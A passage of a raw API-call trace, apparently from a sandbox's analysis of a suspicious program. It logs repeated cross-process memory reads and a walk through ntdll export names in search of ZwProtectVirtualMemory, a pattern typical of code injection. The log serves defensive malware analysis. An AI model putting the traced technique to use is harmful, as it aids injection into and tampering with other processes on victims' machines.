Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45d000, Buffer=0x7ff8, BufferSize=0x265d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45e000, Buffer=0x7ff8, BufferSize=0x265e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee45f000, Buffer=0x7ff8, BufferSize=0x265f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee460000, Buffer=0x7ff8, BufferSize=0x2660000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee461000, Buffer=0x7ff8, BufferSize=0x2661000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.787] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee462000, Buffer=0x7ff8, BufferSize=0x2662000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee463000, Buffer=0x7ff8, BufferSize=0x2663000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee464000, Buffer=0x7ff8, BufferSize=0x2664000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee465000, Buffer=0x7ff8, BufferSize=0x2665000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee466000, Buffer=0x7ff8, BufferSize=0x2666000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee467000, Buffer=0x7ff8, BufferSize=0x2667000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee468000, Buffer=0x7ff8, BufferSize=0x2668000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.788] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee469000, Buffer=0x7ff8, BufferSize=0x2669000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46a000, Buffer=0x7ff8, BufferSize=0x266a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46b000, Buffer=0x7ff8, BufferSize=0x266b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46c000, Buffer=0x7ff8, BufferSize=0x266c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46d000, Buffer=0x7ff8, BufferSize=0x266d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46e000, Buffer=0x7ff8, BufferSize=0x266e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee46f000, Buffer=0x7ff8, BufferSize=0x266f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.789] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee470000, Buffer=0x7ff8, BufferSize=0x2670000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee471000, Buffer=0x7ff8, BufferSize=0x2671000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee472000, Buffer=0x7ff8, BufferSize=0x2672000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee473000, Buffer=0x7ff8, BufferSize=0x2673000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee474000, Buffer=0x7ff8, BufferSize=0x2674000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee475000, Buffer=0x7ff8, BufferSize=0x2675000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee476000, Buffer=0x7ff8, BufferSize=0x2676000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.790] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee477000, Buffer=0x7ff8, BufferSize=0x2677000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.791] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x1e4, BaseAddress=0xee478000, Buffer=0x7ff8, BufferSize=0x2678000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ff8, NumberOfBytesRead=0x1000) returned 0x0 [0076.812] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwProtectVirtualMemory") returned -1 [0076.812] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwProtectVirtualMemory") returned -1 [0076.812] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwProtectVirtualMemory") returned -1 [0076.812] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwProtectVirtualMemory") returned -1 [0076.812] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0076.812] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0076.812] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwProtectVirtualMemory") returned -1 [0076.812] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwProtectVirtualMemory") returned -1 [0076.812] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgPrint", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.813] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0076.814] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwProtectVirtualMemory") returned -1 [0076.815] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwProtectVirtualMemory") returned -1 [0076.816] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="MD4Final", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="MD4Init", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="MD4Update", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="MD5Final", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="MD5Init", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="MD5Update", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwProtectVirtualMemory") returned -1 [0076.817] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwProtectVirtualMemory") returned -1 [0076.818] lstrcmpA 